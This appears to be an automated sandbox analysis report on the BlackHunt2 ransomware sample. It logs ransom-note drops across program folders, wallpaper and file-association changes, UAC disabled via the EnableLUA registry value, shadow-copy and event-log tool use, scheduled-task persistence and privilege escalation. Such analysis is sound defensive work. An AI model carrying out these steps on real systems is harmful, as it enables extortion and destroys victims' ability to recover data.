File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\fsutil.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\fsutil.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\sv-se\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\nb-no\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\nb-no\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\CourierStd.otf C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\da-dk\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account-select\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\es-es\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\themes\dark\adobe_logo.png C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\de-de\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ru-ru\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\uk-ua\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\help.svg C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\eu\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\pl-pl\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\dotnet\swidtag\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\pt-br\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\pt-br\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\sk-sk\ui-strings.js C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ko-kr\ui-strings.js C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\adc_logo.png C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\it-it\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-gb\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\he-il\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-il\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fr-fr\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\de-de\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\es-es\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\pt-br\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\css\main.css C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\COPYRIGHT C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\Java\jre-1.8\bin\dtplugin\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\images\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\eu-es\ui-strings.js C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\da-dk\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\lt\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sl-si\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\root\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\eu-es\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected] C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\example_icons2x.png C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\zh-cn\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-ae\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ja-jp\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\cs-cz\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\zu\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\distribute_form.gif C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\es-es\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\plugin.js C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\tr-tr\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\xerces.md C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\plugins\gui\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ro-ro\ui-strings.js C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ca-es\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\fi-fi\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\ka\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\hr-hr\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fil_get.svg C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\cs-cz\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\mshta.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\System32\vds.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings C:\Windows\System32\cmd.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 C:\Windows\system32\reg.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2264 wrote to memory of 3936 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 3936 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 3460 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 3460 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 3480 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\Conhost.exe
PID 2264 wrote to memory of 3480 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\Conhost.exe
PID 2264 wrote to memory of 3792 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 3792 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 3936 wrote to memory of 3716 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3936 wrote to memory of 3716 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2264 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 3460 wrote to memory of 2412 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3460 wrote to memory of 2412 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3480 wrote to memory of 2320 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3480 wrote to memory of 2320 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2264 wrote to memory of 784 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 784 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 3944 wrote to memory of 2028 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3944 wrote to memory of 2028 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3792 wrote to memory of 1260 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3792 wrote to memory of 1260 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2264 wrote to memory of 3484 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 3484 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 4884 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 4884 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1020 wrote to memory of 4596 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1020 wrote to memory of 4596 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2572 wrote to memory of 2520 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe
PID 2572 wrote to memory of 2520 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 4808 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 4808 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 3528 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 3528 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 784 wrote to memory of 3796 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 784 wrote to memory of 3796 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2264 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 4884 wrote to memory of 1788 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4884 wrote to memory of 1788 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2264 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 4824 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 4824 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 4808 wrote to memory of 3452 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4808 wrote to memory of 3452 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3484 wrote to memory of 4668 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3484 wrote to memory of 4668 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2264 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 3204 wrote to memory of 716 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe
PID 3204 wrote to memory of 716 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 3228 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 3228 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe

System policy modification

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe

"C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe"

C:\Windows\System32\cmd.exe

